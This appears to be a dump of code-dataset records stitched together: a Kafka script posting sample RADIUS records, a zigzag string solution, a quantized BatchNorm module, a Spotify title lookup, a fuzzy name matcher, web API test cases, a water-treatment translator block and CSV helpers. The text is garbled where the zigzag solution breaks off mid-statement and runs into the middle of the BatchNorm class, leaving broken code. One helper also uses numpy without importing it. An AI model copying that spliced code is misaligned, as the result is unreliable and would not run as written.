'NAS-Port-Id': 'ether2-Dslam 1',\n 'Acct-Output-Packets': 99,\n 'Framed-IP-Address': '5.202.240.27',\n 'Called-Station-Id': 'Hekmat1'\n}\n\nAUTH = {\n 'NAS-IP-Address': '5.202.252.1',\n 'User-Name': u'2166716182',\n 'User-Password': '123456',\n 'NAS-Port-Id': u'ether2-DSLAM',\n 'Called-Station-Id': u'Hafez',\n 'Framed-Protocol': 'PPP',\n 'Service-Type': 'Framed-User',\n 'NAS-Identifier': u'TEH-Hafez',\n 'NAS-Port-Type': 'Ethernet',\n 'Reply-Message': u'E=907',\n 'Calling-Station-Id': u'00:E9:08:58:D1:36',\n 'NAS-Port': 15978145,\n 'start_timestamp': 1480860610,\n 'end_timestamp': 1480860615,\n 'packet_source': 'IBS',\n 'Cisco-AVPair': [\n u'actual-data-rate-upstream=511',\n u'actual-data-rate-downstream=16229',\n u'maximum-interleaving-delay-downstream=0',\n u'actual-interleaving-delay-upstream=20',\n u'actual-interleaving-delay-downstream=8',\n u'client-mac-address=0027.1918.eef1',\n u'circuit-id-tag=PTE-THE-Malekashtar2 atm 12/3:0.35'\n ]\n}\n\nfor i in xrange(10):\n PRODUCER.send('radius_acct', ACCT)\n PRODUCER.send('radius_auth', AUTH)\n\nPRODUCER.flush()\n","sub_path":"server_scripts/radius/populate_radius_spout.py","file_name":"populate_radius_spout.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"139086847","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n if numRows <= 0:\n raise RuntimeError(\"illegal numRows.\")\n if numRows == 1 or numRows >= len(s):\n return s\n step = numRows + numRows - 2#??#去頭去尾而numRows*2是因為來回折返\n c = ['' for i in range(numRows)]\n print('c',c)\n for i in range(len(s)) :\n mod = i % step\n print('step',step,'mod',mod)\n if mod < numRows :#注意:不是mod None:\n super(_QuantizedBatchNorm,\n self).__init__(num_features, eps, momentum, affine, track_running_stats)\n\n assert rt_spec, 'Runtime spec must be provided for quantized module'\n self.rt_spec = rt_spec\n\n self.running_mean_quantizer = rt_spec.maybe_get_weight_quantizer('running_mean')\n self.running_var_quantizer = rt_spec.maybe_get_weight_quantizer('running_var')\n\n self.weight_quantizer = rt_spec.maybe_get_weight_quantizer('weight')\n self.bias_quantizer = rt_spec.maybe_get_weight_quantizer('bias')\n\n @property\n def is_quantized(self):\n return True\n\n def forward(self, input: Tensor) -> Tensor:\n self._check_input_dim(input)\n\n # exponential_average_factor is set to self.momentum\n # (when it is available) only so that it gets updated\n # in ONNX graph when this node is exported to ONNX.\n if self.momentum is None:\n exponential_average_factor = 0.0\n else:\n exponential_average_factor = self.momentum\n\n if self.training and self.track_running_stats:\n # TODO: if statement only here to tell the jit to skip emitting this when it is None\n if self.num_batches_tracked is not None: # type: ignore[has-type]\n self.num_batches_tracked.add_(1) # type: ignore[has-type]\n if self.momentum is None: # use cumulative moving average\n exponential_average_factor = 1.0 / float(self.num_batches_tracked)\n else: # use exponential moving average\n exponential_average_factor = self.momentum\n r\"\"\"\n Decide whether the mini-batch stats should be used for normalization rather than the buffers.\n Mini-batch stats are used in training mode, and in eval mode when buffers are None.\n \"\"\"\n if self.training:\n bn_training = True\n else:\n bn_training = (self.running_mean is None) and (self.running_var is None)\n r\"\"\"\n Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be\n passed when the update should occur (i.e. in training mode when they are tracked), or when buffer stats are\n used for normalization (i.e. in eval mode when buffers are not None).\n \"\"\"\n\n running_mean = self.running_mean_quantizer(\n self.running_mean) if self.running_mean_quantizer else self.running_mean\n running_var = self.running_var_quantizer(\n self.running_var) if self.running_var_quantizer else self.running_var\n\n weight = self.weight_quantizer(\n self.weight) if self.weight_quantizer else self.weight\n bias = self.bias_quantizer(self.bias) if self.bias_quantizer else self.bias\n\n return F.batch_norm(\n input,\n # If buffers are not to be tracked, ensure that they won't be updated\n running_mean if not self.training or self.track_running_stats else None,\n running_var if not self.training or self.track_running_stats else None,\n weight,\n bias,\n bn_training,\n exponential_average_factor,\n self.eps,\n )\n\n @classmethod\n def from_float(cls, mod, rt_spec):\n \"\"\"Create a quantized module from a float module.\"\"\"\n assert rt_spec, 'Runtime spec must be provided for quantized module.'\n assert type(mod) == cls._FLOAT_MODULE, \\\n '{}.from_float() only accepts {}, but got {}'.format(\n cls.__name__, cls._FLOAT_MODULE, type(mod))\n\n norm = cls(\n mod.num_features,\n mod.eps,\n mod.momentum,\n mod.affine,\n mod.track_running_stats,\n rt_spec=rt_spec)\n\n norm.weight = mod.weight\n norm.bias = mod.bias\n norm.running_mean = mod.running_mean\n norm.running_var = mod.running_var\n norm.num_batches_tracked = mod.num_batches_tracked\n return norm\n\nclass QuantizedBatchNorm2d(_QuantizedBatchNorm):\n _FLOAT_MODULE = nn.BatchNorm2d\n\n def _check_input_dim(self, input):\n nn.BatchNorm2d._check_input_dim(self, input)\n\nclass QuantizedBatchNorm3d(_QuantizedBatchNorm):\n _FLOAT_MODULE = nn.BatchNorm3d\n\n def _check_input_dim(self, input):\n nn.BatchNorm3d._check_input_dim(self, input)\n","sub_path":"src/vai_quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/quantization/modules/batchnorm.py","file_name":"batchnorm.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"86371860","text":"import web\nimport urllib\nimport urllib2\nimport json\nimport re\n\n# Returns a list of songs(playlist).\n# The titles of the songs in the row form the initial text (without chars like spaces, commas etc)\ndef getPlaylist(text):\n tokens = re.split(r\"[\\s\\+*.,!\\?]+\",text)\n playlist = getSonglist(tokens)\n return playlist\n\n# Returns a list of songs.\n# Forward chaining, depth-first.\n# LongestMatch.\ndef getSonglist(tokens=[], minSongSize=1, maxSongSize=5):\n length = len(tokens)\n for j in range(min(length,maxSongSize),minSongSize-1,-1):\n songTitle= \" \".join(tokens[0:j])\n song = findSongByTilte(songTitle)\n songlist = []\n if (song):\n subplaylist = getSonglist(tokens[j:],minSongSize, maxSongSize)\n if (len(subplaylist)>0 or j==length):\n songlist.insert(0,song)\n songlist += subplaylist\n return songlist\n return []\n\n# TO DO: Search to other pages if nothing found.\n# TO DO: The url of spotify Metadata API doesn t belong here.\n# Returns song, the title of which matches the query string.\n# Uses the Spotify Metadata API to find songs.\ndef findSongByTilte(query):\n title_s = query.lower().strip()\n q = 'title:'+ title_s\n params = {'q': q, 'page': 1}\n url = 'http://ws.spotify.com/search/1/track.json?'\n url += urllib.urlencode(params)\n request = urllib2.Request(url)\n response = urllib2.urlopen(request)\n tracks = json.load(response)['tracks']\n #trackresults = []\n for track in tracks:\n if (track['name'].lower().strip() == title_s):\n trackresult = {\"uri\": track['href'], \\\n \"trackname\": track['name']}\n return trackresult\n #trackresults.append(trackresult)\n return ''\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105591241","text":"import jellyfish as jf\nimport pandas as pd\nimport fuzzy as fz\nimport unicodedata\nimport itertools\nimport re\n\n#performs fuzzy string matching based on a combination of edit distance and phonetic soudns\nclass fuzzyMatch:\n\n def __init__(self,fromVec):\n\n self.fromVec = fromVec\n\n #performs fuzzy string matching based on a combination of edit distance and phonetic soudns\n \n def matchNames(self,toVec,minMatchRatio=0.885):\n \n #creates 4 different kind of sound vectors\n def transcribePhonetic(vec): \n DM = fz.DMetaphone(20)\n SX = fz.Soundex(4)\n if type(vec)!=pd.core.series.Series:\n vec = pd.Series(vec)\n vec = vec.map(lambda x: re.sub('\\s+',' ',\n re.sub(r\"[^\\w'\\s-]\", '',\n unicodedata.normalize('NFKD', unicode(x)).encode('ascii', 'ignore')))\n .strip().replace(' - ','-'))\n df = vec.map(lambda x: [x]+DM(unicode(x))+[fz.nysiis(unicode(x))]+[jf.match_rating_codex(unicode(x))]+[jf.soundex(unicode(x))]).apply(pd.Series)\n df.loc[:,0] = df.loc[:,0].map(lambda x: x.lower().replace('-',' ').replace(\"'\",\"\"))\n return df\n \n #remove matches from both matchee (frDF) and matcher (toDF) lists\n def removeMatches(frDF,toDF,mtchDF):\n frDF = frDF.loc[~frDF.loc[:,6].isin(mtchDF.loc[:,'Original']),:]\n toDF = toDF.loc[~toDF.loc[:,6].isin(mtchDF.loc[:,'Match']),:]\n return frDF,toDF\n \n #Only choose matches that \n def filterByEditDist(mrgDF,minMatchRatio=0.885):\n if mrgDF.empty:\n return mrgDF\n mrgDF['Dist'] = mrgDF.apply(lambda x: jf.jaro_winkler(unicode(x[0]),unicode(x[1])),axis=1)\n mrgDF = mrgDF.groupby('Original').apply(lambda x: x[x.Dist==x.Dist.max()]).reset_index(drop=True)\n return mrgDF.loc[mrgDF['Dist']>=minMatchRatio,['Original','Match']]\n \n #Find all matching rows between 2 dataframes where only k of N columns match\n def mergeOnKofNCols(frDF,toDF,colNames,k):\n colCmbns = [[1]+list(x) if x[0]==2 else list(x) for x in list(itertools.combinations(colNames,k))]\n mrgDF = pd.DataFrame(columns=['Original','Match'])\n for x in colCmbns:\n mrgDF = pd.concat([mrgDF,pd.merge(frDF,toDF,on=list(x),how='inner').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})])\n return mrgDF.drop_duplicates()\n\n #if inputs empty\n frVec = self.fromVec\n if len(frVec)==0 or len(toVec)==0:\n return pd.DataFrame(columns=['Original','Match'])\n \n #remove duplicates\n frVec = frVec.drop_duplicates()\n toVec = toVec.drop_duplicates()\n\n #Transcribe names phonetically \n frDF = transcribePhonetic(frVec)\n toDF = transcribePhonetic(toVec)\n\n #Concatenate with deduplicated list\n frDF = pd.concat([frDF.reset_index(drop=True),frVec.reset_index(drop=True)],axis=1,ignore_index=True)\n toDF = pd.concat([toDF.reset_index(drop=True),toVec.reset_index(drop=True)],axis=1,ignore_index=True)\n \n #first match directly on ASCII\n mtchDF = pd.merge(frDF,toDF,on=0,how='inner').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #second match on all phonetic sounds\n phoneCols = [1,2,3,4,5]\n mrgDF = pd.merge(frDF.loc[:,1:6],toDF.loc[:,1:6],on=phoneCols,how='inner').iloc[:,[-1,-2]].rename(columns={'6_x':'Original','6_y':'Match'})\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #third match on any k of n phonetic sounds in descending order of k\n for k in reversed(range(1,len(phoneCols)-1)):\n mrgDF = mergeOnKofNCols(frDF,toDF,phoneCols,k)\n #use edit distance to break ties\n mrgDF = filterByEditDist(mrgDF,minMatchRatio)\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #Finally match by edit distance only\n mrgDF = pd.merge(frDF.assign(key=1),toDF.assign(key=1),on='key',how='outer').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})\n\n #use edit distance to break ties\n mrgDF = filterByEditDist(mrgDF,minMatchRatio)\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n\n self.matches = mtchDF\n\n return mtchDF\n\n #Use matchNames to replace items in vector with its corresponding match in another vector or dataframe\n def rplcNames(self,mtchDF=[],enforceMatch=True,minMatchRatio=0.885):\n\n frVec = self.fromVec\n if len(mtchDF)==0:\n mtchDF = self.matches\n\n if not isinstance(mtchDF, pd.DataFrame):\n toVec = mtchDF\n mtchDF = self.matchNames(toVec,minMatchRatio)\n \n frVec = pd.Series(frVec)\n rplcVec = frVec.map(mtchDF.set_index('Original')['Match'])\n \n #enforceMatch forces all items in frVec to be matched with toVec else error\n if not enforceMatch:\n rplcVec.loc[pd.isnull(rplcVec)] = frVec.loc[pd.isnull(rplcVec)]\n else:\n if sum(pd.isnull(rplcVec)*1)>0:\n return 'Error, Not everything matched!'\n \n return rplcVec\n\n #Performs nested match where matches must be within grouped subsets (e.g. markets must match within adm1 and adm2 districts)\n def grpByMatch(self,dfRplc,cols):\n\n dfSub = self.fromVec\n\n #First find and replace the first column\n findVec = dfSub.loc[:,cols[0]].drop_duplicates().reset_index(drop=True)\n rplcVec = dfRplc.loc[:,cols[0]].drop_duplicates().reset_index(drop=True)\n toSubVec = fuzzyMatch(findVec).matchNames(rplcVec).set_index('Original')['Match']\n dfSub.loc[:,cols[0]] = dfSub.loc[:,cols[0]].replace(toSubVec.to_dict())\n \n if len(cols)>1:\n #Now progressively increase the set of group by columns\n for i in range(1,len(cols)):\n grpByCols = cols[0:i]\n mtchCol = cols[i]\n \n #create groups from group by cols\n grouped = dfSub.loc[:,grpByCols+[mtchCol]].groupby(grpByCols)\n for name, group in grouped:\n \n #vector of names to be replaced\n findVec = group.loc[:,mtchCol].drop_duplicates().dropna().reset_index(drop=True)\n #vector of substitute names to be matched to\n rplcDf = pd.merge(dfRplc.loc[:,grpByCols+[mtchCol]].drop_duplicates(),group.loc[:,grpByCols].drop_duplicates(),on=grpByCols)\n rplcVec = rplcDf.loc[:,mtchCol].drop_duplicates().dropna().reset_index(drop=True)\n \n #perform fuzzy match\n if not findVec.empty and not rplcVec.empty:\n toSubVec = fuzzyMatch(findVec).matchNames(rplcVec).set_index('Original')['Match']\n \n #substitute results into original DF\n if not toSubVec.empty:\n dfSub.loc[group.index.values,mtchCol] = dfSub.loc[group.index.values,mtchCol].replace(toSubVec.to_dict())\n\n return dfSub\n\n\n#check for and remove extraneous hierachies (e.g. {A}c{A}c{b,e,d} -> {A}c{b,e,d})\ndef groupReduce(df,dfMrr=[]):\n \n #dfMrr mirrors operations on another dataframe of same size (e.g. IDs)\n if len(dfMrr)>0:\n dfMrr = dfMrr.reindex(index=df.index)\n\n #Replace nans as they are excluded in groupbys\n df = df.fillna('NULL')\n \n #to store result\n newGrp = pd.DataFrame([]) \n newMrr = pd.DataFrame([])\n \n #group df by first column\n grps = df.groupby(df.columns.tolist()[0])\n for name,grp in grps:\n \n #if mirror df is not empty create slice based on group\n if len(dfMrr)>0: \n mrr = dfMrr.loc[grp.index,:]\n else:\n mrr = pd.DataFrame(columns=grp.columns.tolist())\n \n if grp.iloc[:,1].unique().tolist().__len__()==1 and grp.shape[0]>1:\n #if second column has only one unique value and is greater than length 1 then shift df 1 column to left\n if grp.shape[1]>2:\n grp.iloc[:,1:-1] = grp.iloc[:,2:].values\n mrr.iloc[:,1:-1] = mrr.iloc[:,2:].values\n \n #set last column to null\n grp.iloc[:,-1] = np.nan\n if not mrr.empty: # Mirror operation on mirror slice\n mrr.iloc[:,-1] = np.nan\n \n if grp.shape[1]>2: #recurse\n try:\n rdcGrp,rdcMrr = groupReduce(grp.iloc[:,1:],mrr.iloc[:,1:])\n grp.iloc[:,1:] = rdcGrp.values\n mrr.iloc[:,1:] = rdcMrr.values\n except Exception as e:\n debug()\n \n newGrp = newGrp.append(grp.replace('NULL',np.nan))\n newMrr = newMrr.append(mrr)\n \n return newGrp, newMrr","sub_path":"fuzzyMatch.py","file_name":"fuzzyMatch.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458869956","text":"# coding = utf-8\nimport unittest\nimport faker\nimport datetime\nfrom pypinyin import lazy_pinyin\nfrom testCase import login\nfrom publicCommon.print_data import PrintData\n\n\nclass StartData(unittest.TestCase):\n u\"\"\"测试模块:基础设置\"\"\"\n fake = faker.Faker(locale='zh_CN')\n\n @classmethod\n def setUpClass(cls):\n print('测试模块:基础设置')\n cls.session = login.session\n cls.host = login.host\n cls.headers = login.headers\n cls.yin_hang = \"工商银行\"\n cls.credit_card_number = StartData.fake.credit_card_number()\n cls.now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cls.name = StartData.fake.name()\n cls.login_name = ''.join(lazy_pinyin(cls.name))\n cls.number = StartData.fake.phone_number()\n cls.company = StartData.fake.company_prefix()\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n def test_001(self):\n u\"\"\"部门管理页面\"\"\"\n url = '/Organization/index.html'\n response = '部门管理'\n r = self.session.post(self.host + url, headers=self.headers)\n r_test = r.text\n pr = PrintData(url, r_test, response)\n pr.print_data()\n self.assertIn(response, r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_002(self):\n u\"\"\"获取公司ID\"\"\"\n url = '/Organization/getOrganizationTree'\n response = 200\n r1 = self.session.post(self.host + url, headers=self.headers)\n r1_json = r1.json()\n global cid # 公司ID\n cid = r1_json[0]['id']\n pr = PrintData(url, r1_json[0], response)\n pr.print_data()\n self.assertEqual(response, r1.status_code, '状态码:' + str(r1.status_code) + ':页面打开失败')\n\n def test_003(self):\n u\"\"\"新增部门\"\"\"\n data = {\n \"type\": 2,\n \"pid\": cid,\n \"cid\": cid,\n \"depart\": self.company\n }\n r1 = self.session.post(self.host + 'Organization/saveOrganization', data=data, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_004(self):\n u\"\"\"获取新增部门ID\"\"\"\n r2 = self.session.post(self.host + '/Organization/getOrganizationTree', headers=self.headers)\n r2_json = r2.json()\n global depart_id # 部门ID\n depart_id = r2_json[0]['children'][-1]['id']\n self.assertEqual(200, r2.status_code, '状态码:' + str(r2.status_code) + ':页面打开失败')\n\n def test_005(self):\n u\"\"\"角色权限页面\"\"\"\n r = self.session.post(self.host + '/Role/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('角色权限', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_006(self):\n u\"\"\"新增角色\"\"\"\n data = {\n \"name\": \"测试角色权限\"\n }\n r1 = self.session.post(self.host + '/Role/saveRole', data=data, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_007(self):\n u\"\"\"获取新角色ID\"\"\"\n r2 = self.session.post(self.host + '/Role/getRoleTree', headers=self.headers)\n r2_json = r2.json()\n global role_id\n role_id = r2_json[-1]['id']\n self.assertEqual(200, r2.status_code, '状态码:' + str(r2.status_code) + ':页面打开失败')\n\n def test_008(self):\n u\"\"\"公司账户页面\"\"\"\n r = self.session.post(self.host + '/CompanyAccount/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('公司账户', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_009(self):\n u\"\"\"新增公司账户\"\"\"\n data1 = {\n \"id\": \"\",\n \"bank_name\": self.yin_hang,\n \"account_name\": \"test公司账户1\",\n \"account_number\": self.credit_card_number,\n \"account_create_date\": self.now_time,\n \"account_currency_type\": 1,\n \"use\": \"收款\",\n \"status\": 1\n }\n r1 = self.session.post(self.host + 'CompanyAccount/saveAccount', data=data1, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_010(self):\n u\"\"\"公司账户查询\"\"\"\n data = {\n \"status\": \"\",\n \"bank_name\": self.yin_hang,\n \"account_number\": self.credit_card_number,\n \"page\": 1,\n \"rows\": 15\n }\n r2 = self.session.post(self.host + '/CompanyAccount/getList', data=data, headers=self.headers)\n r2_json = r2.json()\n self.assertIn(self.credit_card_number, r2_json['rows'][0]['account_number'], '无该公司账户')\n\n def test_011(self):\n u\"\"\"账号管理页面\"\"\"\n r = self.session.post(self.host + '/Account/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('登录账号', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_012(self):\n u\"\"\"新增账号:若失败,可能是账户数达到上限\"\"\"\n data1 = {\n \"login_name\": self.login_name,\n \"name\": self.name,\n \"id\": \"\",\n \"depart_id\": depart_id,\n \"role_id[]\": role_id,\n \"is_operate\": 1,\n \"phone\": self.number\n }\n r1 = self.session.post(self.host + '/Account/addAccount', data=data1, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'][0:11])\n\n def test_013(self):\n u\"\"\"账号列表:若失败,因账户数上限未添加成功\"\"\"\n data = {\n \"page\": 1,\n \"rows\": 15\n }\n r = self.session.post(self.host + '/Account/getList', data=data, headers=self.headers)\n r_json = r.json()\n global name_id\n name_id = r_json['rows'][0]['id']\n self.assertIn(self.name, r_json['rows'][0]['name'], r_json['rows'][0]['name'])\n\n def test_014(self):\n u\"\"\"账号查询\"\"\"\n data = {\n \"search_name\": name_id,\n \"page\": 1,\n \"rows\": 15\n }\n r = self.session.post(self.host + '/Account/getList', data=data, headers=self.headers)\n r_json = r.json()\n self.assertIn(name_id, r_json['rows'][0]['id'], r_json['rows'][0]['id'])\n\n def test_015(self):\n u\"\"\"商品名称页面\"\"\"\n r = self.session.post(self.host + '/CompanyLogo/index.html', headers=self.headers)\n r_text = r.text\n self.assertIn('商标及名称修改', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_016(self):\n u\"\"\"个人密码页面\"\"\"\n r = self.session.post(self.host + '/User/account.html', headers=self.headers)\n r_text = r.text\n self.assertIn('个人密码', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_017(self):\n u\"\"\"数据授权页面\"\"\"\n r = self.session.post(self.host + '/Accredit/index.html', headers=self.headers)\n r_text = r.text\n self.assertIn('数据授权', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n","sub_path":"testCase/test1_Start_Data.py","file_name":"test1_Start_Data.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384775041","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\n\"\"\"Translator blocks for supported property packages\"\"\"\n\nfrom pyomo.environ import Constraint\nfrom idaes.models.unit_models.translator import Translator\nfrom idaes.core.util.scaling import (\n calculate_scaling_factors,\n constraint_scaling_transform,\n get_scaling_factor,\n)\nfrom watertap.examples.flowsheets.full_treatment_train.model_components import (\n property_models,\n)\n\n\ndef build_tb(m, base_inlet=\"ion\", base_outlet=\"TDS\", name_str=None):\n \"\"\"\n Build a translator block to convert for the specified base from inlet to outlet.\n \"\"\"\n\n if name_str is None:\n name_str = \"tb_\" + base_inlet + \"_to_\" + base_outlet\n\n if base_inlet not in [\"ion\", \"salt\"]:\n raise ValueError(\n \"Unexpected property base inlet {base_inlet} for build_tb\"\n \"\".format(base_inlet=base_inlet)\n )\n prop_inlet = property_models.get_prop(m, base=base_inlet)\n\n if base_outlet not in [\"TDS\"]:\n raise ValueError(\n \"Unexpected property base outlet {base_outlet} for build_tb\"\n \"\".format(base_outlet=base_outlet)\n )\n prop_outlet = property_models.get_prop(m, base=base_outlet)\n\n # build translator block\n setattr(\n m.fs,\n name_str,\n Translator(\n inlet_property_package=prop_inlet, outlet_property_package=prop_outlet\n ),\n )\n blk = getattr(m.fs, name_str)\n\n # scale translator block to get scaling factors\n calculate_scaling_factors(blk)\n\n # add translator block constraints\n blk.eq_equal_temperature = Constraint(\n expr=blk.inlet.temperature[0] == blk.outlet.temperature[0]\n )\n constraint_scaling_transform(\n blk.eq_equal_temperature, get_scaling_factor(blk.properties_in[0].temperature)\n )\n blk.eq_equal_pressure = Constraint(\n expr=blk.inlet.pressure[0] == blk.outlet.pressure[0]\n )\n constraint_scaling_transform(\n blk.eq_equal_pressure, get_scaling_factor(blk.properties_in[0].pressure)\n )\n\n if base_inlet == \"ion\" and base_outlet == \"TDS\":\n blk.eq_H2O_balance = Constraint(\n expr=blk.inlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n )\n constraint_scaling_transform(\n blk.eq_H2O_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"H2O\"]\n ),\n )\n\n blk.eq_TDS_balance = Constraint(\n expr=sum(\n blk.inlet.flow_mass_phase_comp[0, \"Liq\", j]\n for j in [\"Na\", \"Ca\", \"Mg\", \"SO4\", \"Cl\"]\n )\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"TDS\"]\n )\n constraint_scaling_transform(\n blk.eq_TDS_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"TDS\"]\n ),\n )\n\n elif base_inlet == \"salt\" and base_outlet == \"TDS\":\n blk.eq_H2O_balance = Constraint(\n expr=blk.inlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n )\n constraint_scaling_transform(\n blk.eq_H2O_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"H2O\"]\n ),\n )\n\n blk.eq_TDS_balance = Constraint(\n expr=sum(\n blk.inlet.flow_mass_phase_comp[0, \"Liq\", j]\n for j in [\"NaCl\", \"CaSO4\", \"MgSO4\", \"MgCl2\"]\n )\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"TDS\"]\n )\n constraint_scaling_transform(\n blk.eq_TDS_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"TDS\"]\n ),\n )\n\n else:\n raise ValueError(\"Unexpected property base combination for build_tb\")\n\n blk.properties_in[0].mass_frac_phase_comp # touch for initialization\n blk.properties_out[0].mass_frac_phase_comp\n","sub_path":"watertap/examples/flowsheets/full_treatment_train/flowsheet_components/translator_block.py","file_name":"translator_block.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"307735386","text":"# -*- coding: utf-8 -*-\nfrom __future__ import with_statement\nimport csv, codecs, cStringIO\n\n__all__ = ['parse_csv', 'UnicodeWriter', 'UnicodeReader']\n\ndef guess_charset(stream):\n \"\"\"\n Try to guess charset using naive technique - try to read stream\n using given set of charsets, if for any charset everything is read\n without any errors use it.\n \"\"\"\n charsets = ['utf-8', 'cp1250', 'iso8859_2', 'cp852']\n for charset in charsets:\n stream.seek(0)\n try:\n for c in codecs.iterdecode(stream, charset):\n pass\n except:\n continue\n else:\n return charset\n\n return None\n\ndef parse_csv(path, charset = 'cp1250'):\n \"\"\"\n Load a CSV file into memory. Ignore all lines starting with #. Try to guess file format and ignore header as well.\n Values are stripped of white spaces.\n \"\"\"\n decoder = codecs.getdecoder(charset)\n\n with open(path, \"rb\") as stream:\n dialect=csv.Sniffer().sniff(stream.read())\n stream.seek(0)\n\n result = []\n for cols in csv.reader(stream, dialect=dialect):\n if len(cols) < 5:\n continue\n if isinstance(cols[0], basestring):\n if len(cols[0]) == 0 or cols[0].startswith(\"#\"):\n continue\n\n result.append(map(lambda col: decoder(col, errors='replace')[0].strip(), cols))\n\n empty_cols = {}\n for row in result:\n for cn in range(0, len(row)):\n if len(row[cn]) == 0:\n empty_cols[cn] = empty_cols.get(cn, 0) + 1\n \n for cn, nr in empty_cols.items():\n if nr == len(result):\n # It's empty for all rows\n for row in result:\n row.pop(cn)\n return result\n\nclass UTF8Recoder(object):\n \"\"\"\n Iterator that reads an encoded stream and reencodes the input to UTF-8\n \"\"\"\n def __init__(self, f, encoding):\n self.reader = codecs.getreader(encoding)(f)\n\n def __iter__(self):\n return self\n\n def next(self):\n return self.reader.next().encode(\"utf-8\")\n\nclass UnicodeReader(object):\n \"\"\"\n A CSV reader which will iterate over lines in the CSV file \"f\",\n which is encoded in the given encoding.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n f = UTF8Recoder(f, encoding)\n self.reader = csv.reader(f, dialect=dialect, **kwds)\n\n def next(self):\n row = self.reader.next()\n return [unicode(s, \"utf-8\") for s in row]\n\n def __iter__(self):\n return self\n\nclass UnicodeWriter(object):\n \"\"\"\n A CSV writer which will write rows to CSV file \"f\",\n which is encoded in the given encoding.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n self.queue = cStringIO.StringIO()\n self.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n self.stream = f\n self.encoder = codecs.getencoder(encoding)\n self.encoding = encoding\n\n def writerow(self, row):\n self.writer.writerow([s.encode(\"utf-8\") for s in row])\n # Fetch UTF-8 output from the queue ...\n data = self.queue.getvalue()\n if self.encoding != 'utf-8':\n data = data.decode(\"utf-8\")\n # ... and reencode it into the target encoding\n data = self.encoder(data, errors='replace')[0]\n # write to the target stream\n self.stream.write(data)\n # empty queue\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n","sub_path":"fiveCents/branches/balance_add_menu/fivecents/lib/import_helpers.py","file_name":"import_helpers.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143653733","text":"# -*- coding: utf-8 -*-\nimport csv\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport 